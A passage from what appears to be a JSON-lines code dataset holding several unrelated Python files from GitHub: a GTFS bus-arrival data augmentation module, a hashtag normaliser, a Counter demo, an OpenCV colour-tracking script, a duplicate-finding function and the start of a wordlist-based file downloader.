PointerProperty(type=Bouncy_PROP_Main)\n\n\ndef unregister():\n bpy.utils.unregister_module(__name__)\n del bpy.types.WindowManager.bouncy \n\n\nif __name__ == \"__main__\":\n register()\n","repo_name":"diegogangl/bouncy_ball","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8294,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"18754881057","text":"\"\"\"\r\nAuthor: Anastassios Dardas, PhD - Higher Education Specialist at Education & Research at Esri Canada.\r\nDate: Re-modified Q1-2022\r\n\r\nAbout: 3 Classes with their own unique purpose.\r\n\t\ta) CalcSemiDf - starts building the dataframe in preparation for data augmentation.\r\n\t\t\t\t\t - Schema: stop_seque, end_paths, dist, Tot_Dist\r\n\r\n\t b) CalcEnhanceDf - Data Augmentation\r\n\t - Schema: trip_id, idx, stop_id, stop_seque, status, proj_speed, x, y,\r\n\t Tot_Dist, dist, dist_futr, futr_trvel, proj_trvel, curr_time,\r\n\t est_arr, off_earr, tmp_arr, sched_arr, arr_tmedif, off_arrdif,\r\n\t perc_chge, perf_rate, dept_time, end_path\r\n\r\n c) RefineDf -\r\n\"\"\"\r\n\r\nfrom pandas import DataFrame, concat\r\nfrom typing import List\r\nfrom .deltas import TimeDelta\r\nimport datetime as dt\r\n\r\n\r\nclass CalcSemiDf:\r\n\r\n\tdef __init__(self, consec_stpseq: List, consec_pths: List, consec_dist: List, btwn_df: DataFrame):\r\n\t\t\"\"\"\r\n\t\tConcatenates the 1st and 2nd consecutive veh. with dataframe that happened in-between (only mult-stop).\r\n\r\n\t\t:param consec_stpseq: A list containing the first and last stop sequence of the consecutive pair.\r\n\t\t:param consec_pths: A list containing the drawn paths from the 1st veh to its stop sequence (forward) and the 2nd veh past from its previous stop sequence (reverse).\r\n\t\t:param consec_dist: A list containing the list travelled from the 1st veh to its stop sequence and the 2nd veh travelled past from its previous stop sequence (reverse).\r\n\t\t:param btwn_df: If applicable (in-between stops classifier), the dataframe of the stops in-between 1st & 2nd veh; Schema: stop_seque, end_path, dist.\r\n\r\n\t\t:returns: Semi-final dataframe with the following schema: stop_seque, end_path, dist, and Tot_Dist (total distance covered).\r\n\t\t\"\"\"\r\n\r\n\t\tself.semi_df = self._enhance_semi_df(consec_stpseq=consec_stpseq,\r\n\t\t consec_pths=consec_pths,\r\n\t\t consec_dist=consec_dist,\r\n\t\t btwn_df=btwn_df)\r\n\r\n\r\n\tdef _enhance_semi_df(self, consec_stpseq, consec_pths, consec_dist, btwn_df):\r\n\t\t\"\"\"\r\n\t\t:param consec_stpseq: A list containing the first and last stop sequence of the consecutive pair.\r\n\t\t:param consec_pths: A list containing the drawn paths from the 1st veh to its stop sequence (forward) and the 2nd veh past from its previous stop sequence (reverse).\r\n\t\t:param consec_dist: A list containing the list travelled from the 1st veh to its stop sequence and the 2nd veh travelled past from its previous stop sequence (reverse).\r\n\t\t:param btwn_df: If applicable (in-between stops classifier), the dataframe of the stops in-between 1st & 2nd veh; Schema: stop_seque, end_path, dist.\r\n\t\t:return: Semi-final dataframe.\r\n\t\t\"\"\"\r\n\r\n\t\t# If in-between dataframe exists - otherwise proceed to else.\r\n\t\tif btwn_df is not None:\r\n\r\n\t\t\ttmp_df = DataFrame({'stop_seque': consec_stpseq,\r\n\t\t\t 'end_path': consec_pths,\r\n\t\t\t 'dist' : consec_dist})\r\n\r\n\t\t\trobust_df = (\r\n\t\t\t\tconcat([tmp_df, btwn_df])\r\n\t\t\t\t\t.sort_values(['stop_seque'])\r\n\t\t\t\t\t.pipe(lambda d: d.assign(Tot_Dist = d['dist'].sum()))\r\n\t\t\t)\r\n\r\n\t\t\treturn robust_df\r\n\r\n\t\telse:\r\n\r\n\t\t\ttmp_df = (\r\n\t\t\t\tDataFrame({'stop_seque' : consec_stpseq,\r\n\t\t 'end_path' : consec_pths,\r\n\t\t 'dist' : consec_dist})\r\n\t\t\t\t\t.sort_values(['stop_seque'])\r\n\t\t\t\t\t.pipe(lambda d: d.assign(Tot_Dist = d['dist'].sum()))\r\n\t\t\t)\r\n\r\n\t\t\treturn tmp_df\r\n\r\n\r\nclass CalcEnhanceDf:\r\n\r\n\tdef __init__(self, semi_final_df: DataFrame, trip_id, proj_speed, status, stat_shift, mid_stat, local_time,\r\n\t time_shift, future_dist, stop_times: DataFrame, idx, x1, y1, x2, y2, travel_type):\r\n\t\t\"\"\"\r\n\t\tEnhances the semi-final dataframe with important variables - aka data augmentation.\r\n\r\n\t\t:param semi_final_df: Concatenated dataframe with the following schema: stop_seque, end_path, dist, and Tot_Dist\r\n\t\t:param trip_id: The trip_id being currently assessed.\r\n\t\t:param proj_speed: Calculated projected travel speed (km/h) from time and distance delta between the consecutive pair.\r\n\t\t:param status: Current travel status of the 1st veh.\r\n\t\t:param stat_shift: Current travel status of the 2nd veh.\r\n\t\t:param mid_stat: The connection type that happened in between the 1st and 2nd veh. (e.g., In-Between, One-Stop, etc.).\r\n\t\t:param local_time: The timestamp recorded from the 1st veh.\r\n\t\t:param time_shift: The timestamp recorded from the 2nd veh.\r\n\t\t:param future_dist: The distance that will need to be travelled in the near-future for the 2nd veh.\r\n\t\t:param stop_times: Static GTFS file with scheduled/expected arrival_time and departure time for each stop per trip_id.\r\n\t\t:param idx: The index - determining the number of vehicle movement in the consecutive group.\r\n\t\t:param x1: Snapped x-coordinate of the 1st vehicle.\r\n\t\t:param y1: Snapped y-coordinate of the 1st vehicle.\r\n\t\t:param x2: Snapped x-coordinate of the 2nd vehicle.\r\n\t\t:param y2: Snapped y-coordiante of the 2nd vehicle.\r\n\t\t:param travel_type: The type of movement travel (e.g., movement, one stop, same stop - same segment, same stop - different segment).\r\n\r\n\t\t:return: An enhanced final dataframe - see the _enhance_final_df function of what the output schema is.\r\n\t\t\"\"\"\r\n\r\n\t\tself.final_df = self._enhance_final_df(semi_final_df=semi_final_df,\r\n\t\t trip_id=trip_id,\r\n\t\t proj_speed=proj_speed,\r\n\t\t status=status,\r\n\t\t stat_shift=stat_shift,\r\n\t\t mid_stat=mid_stat,\r\n\t\t local_time=local_time,\r\n\t\t time_shift=time_shift,\r\n\t\t future_dist=future_dist,\r\n\t\t stop_times=stop_times,\r\n\t\t idx=idx,\r\n\t\t x1=x1, y1=y1,\r\n\t\t x2=x2, y2=y2,\r\n\t\t travel_type=travel_type)\r\n\r\n\r\n\tdef _addTime(self, tmp_curr_time, proj_trvel):\r\n\t\t\"\"\"\r\n\t\tEstimates the arrival time from the current timestamp and projected travel time.\r\n\r\n\t\t:param tmp_curr_time: The current timestamp.\r\n\t\t:param proj_trvel: Projected travel time estimated (seconds).\r\n\r\n\t\t:return: New timestamp - formatted: 'YYYY-mm-DD HH:MM:SS'\r\n\t\t\"\"\"\r\n\r\n\t\treturn str(dt.datetime.strptime(tmp_curr_time, '%Y-%m-%d %H:%M:%S') + dt.timedelta(0, proj_trvel))\r\n\r\n\r\n\tdef _estTime(self, curr_time, proj_trvel, btwn_df):\r\n\t\t\"\"\"\r\n\t\tIteratively & cumulatively estimate the arrival time for each observation in the group, except last.\r\n\r\n\t\tDependent function(s): _addTime\r\n\r\n\t\t:param curr_time: Current timestamp - starting with the 1st veh.\r\n\t\t:param proj_trvel: Estimated travel time - starting with the 1st veh.\r\n\t\t:param btwn_df: In-between dataframe (between 1st and 2nd veh.) to assess estimated travel time.\r\n\r\n\t\t:return: A list with estimated arrival time for each observation in the group, except last - set as None.\r\n\t\t\"\"\"\r\n\r\n\t\tfrst_esttime = self._addTime(tmp_curr_time=curr_time, proj_trvel=proj_trvel)\r\n\t\tidx_esttime = frst_esttime # Variable used to switch values and calculate estimated arrival time.\r\n\r\n\t\test_time = [frst_esttime] # Add estimate arrival time for first observation\r\n\t\tfor tmp_time in btwn_df['proj_trvel']: # In-between including one-stoppers\r\n\t\t\ttmp_esttime = self._addTime(tmp_curr_time=idx_esttime, proj_trvel=tmp_time)\r\n\t\t\tidx_esttime = tmp_esttime\r\n\t\t\test_time.append(tmp_esttime)\r\n\r\n\t\test_time.append(None) # Add None for the last observation b/c distance to its stop sequence is not calculated in this instance.\r\n\r\n\t\treturn est_time\r\n\r\n\r\n\tdef _classifyOnTime(self, value):\r\n\t\t\"\"\"\r\n\t\tClassifies each observation if it is late, on-time, or early.\r\n\r\n\t\t:param value: Individual value (seconds) from off_arrdif.\r\n\r\n\t\t:return: Str value that classified on-time performance.\r\n\t\t\"\"\"\r\n\r\n\t\tif value <= -120:\r\n\t\t\treturn \"Late\"\r\n\r\n\t\telif -120 < value < 300:\r\n\t\t\treturn \"On-Time\"\r\n\r\n\t\telif value >= 300:\r\n\t\t\treturn \"Early\"\r\n\r\n\r\n\tdef _perfChange(self, value, value2):\r\n\t\t\"\"\"\r\n\t\tIdentify performance change over time. Higher would indicate more abrupt change in travel.\r\n\t\tAbrupt changes could possibly indicate traffic incident or surge in passenger boardings / alightings or\r\n\t\tspeeding up to catch up with their next transit stops. These may happen over space-time broadly.\r\n\r\n\t\t:param value: Individual value from off_arrdif.\r\n\t\t:param value2: 2nd individual value (shift -1) from off_arrdif.\r\n\r\n\t\t:return: Percentage value.\r\n\t\t\"\"\"\r\n\r\n\t\ttry:\r\n\t\t\tchange = value2 - value\r\n\t\t\tperf_change = round((change / value)*100, 2)\r\n\r\n\t\t\t# if value2 is greater than value and the performance change is less than zero - turn to positive.\r\n\t\t\t# Indicate improvement\r\n\t\t\tif (value < value2) and (perf_change < 0):\r\n\t\t\t\treturn -perf_change\r\n\r\n\t\t\telse:\r\n\t\t\t\treturn perf_change\r\n\r\n\t\texcept Exception as e:\r\n\t\t\treturn None\r\n\r\n\r\n\tdef _enhance_final_df(self, semi_final_df: DataFrame, trip_id, proj_speed, status, stat_shift, mid_stat,\r\n\t local_time, time_shift, future_dist, stop_times, idx, x1, y1, x2, y2, travel_type):\r\n\t\t\"\"\"\r\n\t\tEnhance the semi-final dataframe with important variables.\r\n\r\n\t\tDependent function(s): _estTime, _perfChange, _classifyOnTime\r\n\t\tDependent classes: TimeDelta -> Identify time changes in seconds.\r\n\r\n\t\t:param semi_final_df: Concatenated dataframe with the following schema: stop_seque, end_path, dist, and Tot_Dist\r\n\t\t:param trip_id: The trip_id being currently assessed.\r\n\t\t:param proj_speed: Calculated projected travel speed (km/h) from time and distance delta between the consecutive pair.\r\n\t\t:param status: Current travel status of the 1st veh.\r\n\t\t:param stat_shift: Current travel status of the 2nd veh.\r\n\t\t:param mid_stat: The connection type that happened in between the 1st and 2nd veh. (e.g., In-Between, One-Stop, etc.).\r\n\t\t:param local_time: The timestamp recorded from the 1st veh.\r\n\t\t:param time_shift: The timestamp recorded from the 2nd veh.\r\n\t\t:param future_dist: The distance that will need to be travelled in the near-future for the 2nd veh.\r\n\t\t:param stop_times: Static GTFS file with scheduled/expected arrival_time and departure time for each stop per trip_id.\r\n\t\t:param idx: The recorded movement indicator.\r\n\t\t:param x1: Snapped x-coordinate of the 1st vehicle.\r\n\t\t:param y1: Snapped y-coordinate of the 1st vehicle.\r\n\t\t:param x2: Snapped x-coordinate of the 2nd vehicle.\r\n\t\t:param y2: Snapped y-coordinate of the 2nd vehicle.\r\n\t\t:param travel_type: The type of movement travel (e.g., movement, one stop, same stop - same segment, same stop - different segment, stationary, terminus).\r\n\r\n\t\t:return: Enhanced final dataframe with the following schema:\r\n\t\t\t\t\ttrip_id = Identifier of the transit route.\r\n\t\t\t\t\tidx = The cumulative number of vehicle movements - grouped per consecutive pair.\r\n\t\t\t\t\tstop_id = Identifier of the transit stop.\r\n\t\t\t\t\tstop_seque = The sequence number (order) associated to the stop_id.\r\n\t\t\t\t\tstatus = Travel status of the vehicle.\r\n\t\t\t\t\tproj_speed = Projected travel speed (km/h.) from time and distance delta between consecutive pair.\r\n\t\t\t\t\tx = The snapped x-coordinate of where the vehicle was located.\r\n\t\t\t\t\ty = The snapped y-coordinate of where the vehicle was located.\r\n\t\t\t\t\tTot_Dist = The total distance (m) travelled from the 1st to the 2nd veh. consecutive pair.\r\n\t\t\t\t\tdist = Distance traveled on each stop sequence segment - the last observation in the group calculates of what has past (reverse).\r\n\t\t\t\t\tdist_futr = The distance required for the last observation in the group needed to arrive from its current stop_sequence path (forward).\r\n\t\t\t\t\tfutr_trvel = The amount of travel time (sec.) projected to complete the future distance - last observation in the group.\r\n\t\t\t\t\tproj_trvel = The amount of travel time (sec.) projected to complete from 1st veh to 2nd veh (last observation) in the group - from dist and proj_speed.\r\n\t\t\t\t\tcurr_time = The recorded timestamp from the 1st veh. and 2nd veh. (last observation) in the group.\r\n\t\t\t\t\test_arr = The estimated arrival time based on proj_trvel and curr_time - cumulative, except the last observation.\r\n\t\t\t\t\toff_earr = Official estimated arrival time for all observations including the last observation (future).\r\n\t\t\t\t\ttmp_arr = The scheduled/expected arrival time reformatted - excludes the last observation in the group.\r\n\t\t\t\t\tsched_arr = Official scheduled/expected arrival time reformatted - includes the last observation in the group.\r\n\t\t\t\t\tarr_tmedif = Arrival time difference calculated from estimated arrival time and scheduled/expected arrival time - excludes last observation.\r\n\t\t\t\t\toff_arrdif = Official time difference calculated from estimated arrival time and scheduled/expected arrival time - includes last observation (forward).\r\n\t\t\t\t\tperc_chge = Percent change in official time difference - estimates how much of a change there has been in travel over time.\r\n\t\t\t\t\tperf_rate = Classification of on-time performance: Late (<= -120 sec.); On-Time (120 < x < 300); Early (>= 300).\r\n\t\t\t\t\tdept_time = The scheduled/expected departure time (not reformatted).\r\n\t\t\t\t\tend_path = The linestring paths (nested coordinates) that can be drawn out spatially if required.\r\n\t\t\"\"\"\r\n\r\n\t\t# Query by trip_id in the stop_times GTFS static file (improve efficiency) - acquire scheduled/expected arrival_time and departure_time\r\n\t\tsub_stp_time_df = stop_times.query('trip_id == @trip_id')\r\n\r\n\t\tkeep_col = ['trip_id', 'idx', 'stop_id', 'stop_seque', 'status', 'proj_speed', 'x', 'y', 'Tot_Dist', 'dist',\r\n\t\t 'dist_futr', 'futr_trvel', 'proj_trvel', 'curr_time', 'est_arr', 'off_earr', 'tmp_arr',\r\n\t\t\t\t 'sched_arr', 'arr_tmedif', 'off_arrdif', 'perc_chge', 'perf_rate', 'dept_time', 'end_path']\r\n\r\n\t\tif travel_type == \"Multiple Stops\" or travel_type == \"One Stop\":\r\n\t\t\t# Repeat the number of times in between the status. Exclude beginning and end; hence subtract by 2\r\n\t\t\trepeat_mid = len(semi_final_df) - 2\r\n\r\n\t\t\t# Project travel time for the future - after the 2nd vehicle based on current projected speed and distance need to travel.\r\n\t\t\tfuture_trvel = [round(((future_dist / 1000) / proj_speed) * 3600) if future_dist is not None else None][0]\r\n\r\n\t\t\t# Estimate arrival time at the end of destination of its current stop sequence - for the 2nd vehicle.\r\n\t\t\tfuture_arr = [self._addTime(tmp_curr_time=time_shift, proj_trvel=future_trvel) if future_trvel is not None else None][0]\r\n\r\n\t\t\t# Pre-build the dataframe as lists:\r\n\t\t\t# movement status, current time (recorded), distance required to complete (applies only 2nd veh.), and future projected travel time.\r\n\t\t\torder_stat = [status] + repeat_mid * [mid_stat] + [stat_shift]\r\n\t\t\tcurr_time = [local_time] + repeat_mid * [None] + [time_shift]\r\n\t\t\tdist_futr = [None] + repeat_mid * [None] + [future_dist]\r\n\t\t\tfuture_lst = [None] + repeat_mid * [None] + [future_trvel]\r\n\t\t\tidx = [idx] + repeat_mid * [idx] + [idx]\r\n\t\t\tx = [x1] + repeat_mid * [None] + [x2]\r\n\t\t\ty = [y1] + repeat_mid * [None] + [y2]\r\n\r\n\t\t\t# Build the dataframe and merge with the queried stop_times.\r\n\t\t\tfin_df = (\r\n\t\t\t\tsemi_final_df\r\n\t\t\t\t\t.assign(trip_id = trip_id,\r\n idx = idx,\r\n x = x,\r\n y = y,\r\n\t\t\t\t curr_time = curr_time,\r\n\t\t\t\t proj_speed = proj_speed,\r\n\t\t\t\t proj_trvel = lambda d: round(((d['dist'] / 1000) / proj_speed) * 3600), # Get projected travel time in seconds\r\n\t\t\t\t status = order_stat,\r\n\t\t\t\t dist_futr = dist_futr,\r\n\t\t\t\t futr_trvel = future_lst)\r\n\t\t\t\t\t.merge(sub_stp_time_df, on=['trip_id', 'stop_seque'])\r\n\t\t\t)\r\n\r\n\t\t\t## Prepare to calculate iteratively - estimated arrival time\r\n\t\t\tfrst_proj_trvel = fin_df['proj_trvel'].iloc[0] # Get the first projected travel time (sec.) - aka 1st veh.\r\n\t\t\tfrst_curr_time = fin_df['curr_time'].iloc[0] # Get the recorded time of the 1st veh. (consecutive pair)\r\n\t\t\tbtwn_df = fin_df.iloc[1:-1] # Get only in-between to assess estimate time - exclude 1st and last observation\r\n\t\t\test_time_list = self._estTime(curr_time=frst_curr_time,\r\n\t\t\t proj_trvel=frst_proj_trvel,\r\n\t\t\t btwn_df=btwn_df)\r\n\r\n\t\t\t# Build the final dataframe\r\n\t\t\tfinal_df = (\r\n\t\t\t\tfin_df\r\n\t\t\t\t\t.assign(est_arr = est_time_list, # Estimated arrival time\r\n\t\t\t\t draft_date = lambda d: d['est_arr'].str.split(\" \").str[0],\r\n\t\t\t\t sched_arr = lambda d: d['draft_date'].iloc[0] + \" \" + d['arrival_time'],\r\n\t\t\t\t tmp_arr = lambda d: d['draft_date'] + \" \" + d['arrival_time'], # Combine day with hour and second (e.g., 2021-09-30 13:40:30)\r\n\t\t\t\t # The arrival time difference - comparison between estimated arrival time and expected arrival time\r\n\t\t\t\t arr_tmedif = lambda d: d[['est_arr', 'tmp_arr']].apply(lambda r: TimeDelta(*r).change_time, axis=1),\r\n\t\t\t\t off_earr = est_time_list[0:-1] + [future_arr]) # Official estimated arrival_time including the 2nd veh. loc\r\n\t\t\t)\r\n\r\n\t\t\t## Prepare to calculate the time difference from estimated arrival time and scheduled arrival time for the 2nd veh. loc.\r\n\t\t\tlast_off_est_arr = final_df['off_earr'].iloc[-1]\r\n\t\t\tlast_sched_arr = final_df['sched_arr'].iloc[-1]\r\n\t\t\tarr_tme_dif = list(final_df['arr_tmedif'])[0:-1] # From first to second last observation during consecutive pair.\r\n\t\t\tlast_off_tme_dif = [TimeDelta(last_off_est_arr, last_sched_arr).change_time if (last_sched_arr and last_sched_arr) is not None else None][0]\r\n\t\t\toff_tme_dif = arr_tme_dif + [last_off_tme_dif]\r\n\r\n\t\t\t## Finalize the interpolated dataframe and return\r\n\t\t\tfinal_df = (\r\n\t\t\t\tfinal_df\r\n\t\t\t\t\t.assign(off_arrdif = off_tme_dif, # Assign official time difference in all observations - determine what is late, on-time, early\r\n\t\t\t\t\t\t\toff_arrdif_shift = lambda d: d['off_arrdif'].shift(-1),\r\n\t tmp_change = lambda d: d[['off_arrdif', 'off_arrdif_shift']].apply(lambda e: self._perfChange(*e), axis=1),\r\n\t perc_chge = lambda d: d['tmp_change'].shift(1),\r\n\t perf_rate = lambda d: d['off_arrdif'].apply(lambda e: self._classifyOnTime(e)))\r\n\t\t\t\t\t.rename(columns = {'departure_time' : 'dept_time'})\r\n\t\t\t\t[keep_col]\r\n\t\t\t)\r\n\r\n\t\t\treturn final_df\r\n\r\n\r\n\t\telif (travel_type == \"Stationary\"):\r\n\r\n\t\t\tfinal_df = (\r\n\t\t\t\tsemi_final_df\r\n\t\t\t\t\t.assign(trip_id = trip_id,\r\n idx = idx,\r\n x = x1,\r\n y = y1,\r\n\t\t\t\t curr_time = local_time,\r\n\t\t\t\t proj_speed = proj_speed,\r\n\t\t\t\t proj_trvel = None,\r\n\t\t\t\t status = 'Stationary',\r\n\t\t\t\t dist_futr = None,\r\n\t\t\t\t futr_trvel = None)\r\n\t\t\t\t\t.merge(sub_stp_time_df, on=['trip_id', 'stop_seque'])\r\n\t\t\t\t\t.rename(columns = {'departure_time' : 'dept_time'})\r\n\t\t\t\t\t.assign(est_arr = None,\r\n\t\t\t\t draft_date = lambda d: d['curr_time'].str.split(\" \").str[0],\r\n\t\t\t\t tmp_arr = lambda d: d['draft_date'] + \" \" + d['arrival_time'],\r\n\t\t\t\t off_earr = None,\r\n\t\t\t\t sched_arr = None,\r\n\t\t\t\t arr_tmedif = None,\r\n\t\t\t\t off_arrdif = None,\r\n\t\t\t\t perc_chge = None,\r\n\t\t\t\t perf_rate = None)\r\n\t\t\t\t[keep_col]\r\n\t\t\t)\r\n\r\n\t\t\treturn final_df\r\n\r\n\r\n\t\telif (travel_type == \"Same Stop - Same Segment\") or (travel_type == \"Same Stop - Different Segment\") or (travel_type == \"Terminus - Same Segment\") or (travel_type == \"Terminus - Different Segment\"):\r\n\r\n\t\t\tif travel_type == \"Same Stop - Same Segment\" or travel_type == \"Terminus - Same Segment\":\r\n\t\t\t\tseg_stat = \"Same Segment\"\r\n\r\n\t\t\telse:\r\n\t\t\t\tseg_stat = \"Different Segment\"\r\n\r\n\r\n\t\t\t# Flatten out nested distance\r\n\t\t\tfirst_dist = future_dist[0]\r\n\t\t\tfuture_dist = future_dist[1]\r\n\r\n\t\t\tif future_dist is None:\r\n\t\t\t\tfuture_dist = 0\r\n\r\n\t\t\torder_stat = [f\"{status}-{seg_stat}\", f\"{stat_shift}-{seg_stat}\"]\r\n\t\t\tcurr_time = [local_time, time_shift]\r\n\t\t\tdist_futr = [first_dist, future_dist]\r\n\t\t\tidx = [idx, idx]\r\n\t\t\tx = [x1, x2]\r\n\t\t\ty = [y1, y2]\r\n\r\n\t\t\ttry:\r\n\t\t\t\t# Calculate future travel for both veh. points.\r\n\t\t\t\tfuture_trvel_1 = round(((first_dist/1000)/proj_speed)*3600)\r\n\t\t\t\tfuture_trvel_2 = round(((future_dist/1000) / proj_speed) * 3600)\r\n\r\n\t\t\t\tfuture_lst = [future_trvel_1, future_trvel_2]\r\n\t\t\t\tproj_trvel = [round(((f/1000)/proj_speed)*3600) for f in future_lst]\r\n\r\n\t\t\t\t# Use futr_trvel to estimate proj_trvel instead!!\r\n\t\t\t\tfinal_df = (\r\n\t\t\t\t\tsemi_final_df\r\n\t\t\t\t\t\t.assign(trip_id = trip_id,\r\n idx = idx,\r\n x = x,\r\n y = y,\r\n\t\t\t\t\t curr_time = curr_time,\r\n\t\t\t\t\t proj_speed = proj_speed,\r\n\t\t\t\t\t futr_trvel = future_lst,\r\n\t\t\t\t\t proj_trvel = proj_trvel,\r\n\t\t\t\t\t status = order_stat,\r\n\t\t\t\t\t dist_futr = dist_futr,\r\n\t\t\t\t\t est_arr = lambda d: d[['curr_time', 'proj_trvel']].apply(lambda e: self._addTime(*e), axis=1),\r\n\t\t\t\t\t draft_date = lambda d: d['curr_time'].str.split(\" \").str[0])\r\n\t\t\t\t\t\t.merge(sub_stp_time_df, on=['trip_id', 'stop_seque'])\r\n\t\t\t\t\t\t.rename(columns={'departure_time': 'dept_time'})\r\n\t\t\t\t\t\t.assign(sched_arr = lambda d: d['draft_date'].iloc[0] + \" \" + d['arrival_time'],\r\n\t\t\t\t\t tmp_arr = lambda d: d['draft_date'] + \" \" + d['arrival_time'],\r\n\t\t\t\t\t arr_tmedif = lambda d: d[['est_arr', 'tmp_arr']].apply(lambda r: TimeDelta(*r).change_time, axis=1),\r\n\t\t\t\t\t off_earr = lambda d: d['est_arr'],\r\n\t\t\t\t\t off_arrdif = lambda d: d['arr_tmedif'],\r\n off_arrdif_shift = lambda d: d['off_arrdif'].shift(-1),\r\n tmp_change = lambda d: d[['off_arrdif', 'off_arrdif_shift']].apply(lambda e: self._perfChange(*e), axis=1),\r\n perc_chge = lambda d: d['tmp_change'].shift(1),\r\n perf_rate = lambda d: d['off_arrdif'].apply(lambda e: self._classifyOnTime(e))\r\n\t\t\t\t\t )\r\n\t\t\t\t\t[keep_col]\r\n\t\t\t\t)\r\n\r\n\t\t\t\treturn final_df\r\n\r\n\t\t\t# RESOLVE THIS\r\n\t\t\texcept Exception as e:\r\n\r\n\t\t\t\t# For any failure to calculate.\r\n\t\t\t\tfin_df = (\r\n\t\t\t\t\tsemi_final_df\r\n\t\t\t\t\t\t.assign(trip_id=trip_id,\r\n idx=idx,\r\n x = x,\r\n y = y,\r\n\t\t\t\t\t curr_time=curr_time,\r\n\t\t\t\t\t proj_speed=proj_speed,\r\n\t\t\t\t\t futr_trvel=None,\r\n\t\t\t\t\t proj_trvel=None,\r\n\t\t\t\t\t status=order_stat,\r\n\t\t\t\t\t dist_futr=dist_futr,\r\n\t\t\t\t\t est_arr=None,\r\n\t\t\t\t\t sched_arr=None,\r\n tmp_arr=None,\r\n arr_tmedif=None,\r\n off_earr=None,\r\n off_arrdif=None,\r\n perc_chge=None,\r\n perf_rate=None)\r\n\t\t\t\t\t\t.merge(sub_stp_time_df, on=['trip_id', 'stop_seque'])\r\n\t\t\t\t\t\t.rename(columns={'departure_time': 'dept_time'})\r\n\t\t\t\t\t[keep_col]\r\n\t\t\t\t)\r\n\r\n\t\t\t\treturn fin_df","repo_name":"highered-esricanada/Parallel-GTFS-Workflow","sub_path":"package/code/gtfs_process/util/universal_cal.py","file_name":"universal_cal.py","file_ext":"py","file_size_in_byte":23573,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"7839213452","text":"import functions as func\n\ndef normalize_hashtags(hashtag):\n hashtag = hashtag.casefold()\n hashtag = hashtag.replace(\"__\", \"_\")\n hashtag = hashtag.replace(\"ー\",\"\")\n hashtag = hashtag.replace(\"-\",\"\")\n return hashtag\n\nclass Hashtags:\n def __init__(self, file):\n data = func.read_json_file(file)\n self.keys = []\n self.values = {}\n for indx, row in enumerate(data):\n self.keys.append(row['key'])\n for hashtag in row['similares']:\n self.values[normalize_hashtags(hashtag)] = indx\n \n def get_key_hashtag(self,hashtag):\n key_hashtag = None\n hashtag = normalize_hashtags(hashtag)\n if(hashtag in self.values):\n index = self.values[hashtag]\n key_hashtag = self.keys[index]\n return key_hashtag\n \n def get_all_key_hashtags(self):\n return self.keys\n\n ","repo_name":"albertorobles2000/TFG-AlbertoRoblesHernandez","sub_path":"hashtags.py","file_name":"hashtags.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14338923259","text":"from collections import Counter\n\n# dict sub class -- count hashable objects\n\n# counter with lists\n\nlist = [1,2,2,3,3,4,3,4,5,5,5,4,5,5,4]\nprint(Counter(list))\n\n# Counter with strings\n\nstrCount = 'aabbbccccddddde'\nprint(Counter(strCount))\n\n# Counter wiht sentence\n\nsentence = 'How many times does each word show up in this sentence, word times each word each time'\nwords = sentence.split()\nprint('word counter:', Counter(words))\n\nc = Counter(words)\nprint(c.most_common(3))","repo_name":"sasidhar20/python","sub_path":"com/test/python/Oops/Collections/Counter.py","file_name":"Counter.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41208698329","text":"import numpy as np\nimport cv2\n\ndef showVideo() :\n try :\n print(\"Turn on Camera\")\n cap = cv2.VideoCapture(1)\n except :\n print(\"FAIL\")\n return\n\n while True :\n ret, frame = cap.read()\n\n if not ret :\n print(\"ERROR\")\n break\n\n ###########################################################\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n lower_blue = np.array([110,100,100])\n upper_blue = np.array([130,255,255])\n \"\"\"\n lower_green = np.array([50,100,100])\n upper_green = np.array([70,255,255])\n\n lower_red = np.array([-10,100,100])\n upper_red = np.array([10,255,255])\n \"\"\"\n\n mask_blue = cv2.inRange(hsv, lower_blue, upper_blue)\n #mask_green = cv2.inRange(hsv,lower_green, upper_green)\n #mask_red = cv2.inRange(hsv, lower_red, upper_red)\n\n result1 = cv2.bitwise_and(frame, frame, mask = mask_blue)\n #result2 = cv2.bitwise_and(frame, frame, mask = mask_green)\n #result3 = cv2.bitwise_and(frame, frame, mask = mask_red)\n\n if not result :\n print(\"Can not find blue\")\n\n\n cv2.imshow('BLUE', result1)\n #cv2.imshow('GREEN',result2)\n #cv2.imshow('RED',result3)\n\n ###########################################################\n\n\n cv2.imshow('frame',frame)\n k = cv2.waitKey(1) & 0xFF\n if k == 27 :\n break\n # esc : 27(ASCII)\n\n cap.release()\n #opened object close (release)\n cv2.destroyAllWindows\n\nshowVideo()\n","repo_name":"ykiseong303/openCVexam","sub_path":"exam07_color_tracking.py","file_name":"exam07_color_tracking.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14688636618","text":"# def binary_search(numbers, target):\n# numbers.sort()\n# start = 0\n# end = len(numbers) - 1\n\n# while start <= end:\n# mid = (start + end) // 2\n\n# if numbers[mid] == target:\n# return target\n\n# if target < numbers[mid]:\n# end = mid - 1\n# else:\n# start = mid + 1\n\n# return False\n\n\ndef find_duplicate(nums):\n if type(nums) != list or len(nums) <= 1:\n return False\n nums.sort()\n for i, n in enumerate(nums[:-1]):\n if type(n) == str or n < 0:\n return False\n if n == nums[i + 1]:\n return n\n\n return False\n","repo_name":"viegasjean/algorithms","sub_path":"challenges/challenge_find_the_duplicate.py","file_name":"challenge_find_the_duplicate.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38153928859","text":"import urllib.request\r\nimport os\r\nimport requests\r\n\r\ndef download_file(url, destination_path):\r\n # URL'den dosya aç ve oku\r\n with urllib.request.urlopen(url) as url:\r\n # Hedef dizine dosyayı yaz\r\n with open(destination_path, 'wb') as f:\r\n f.write(url.read())\r\n\r\ndef download_from_wordlist(wordlist_path):\r\n # İndirilen dosyaların sayısını saklamak için sayaç\r\n counter = 0\r\n # Kelime listesini aç\r\n with open(wordlist_path, 'r') as f:\r\n 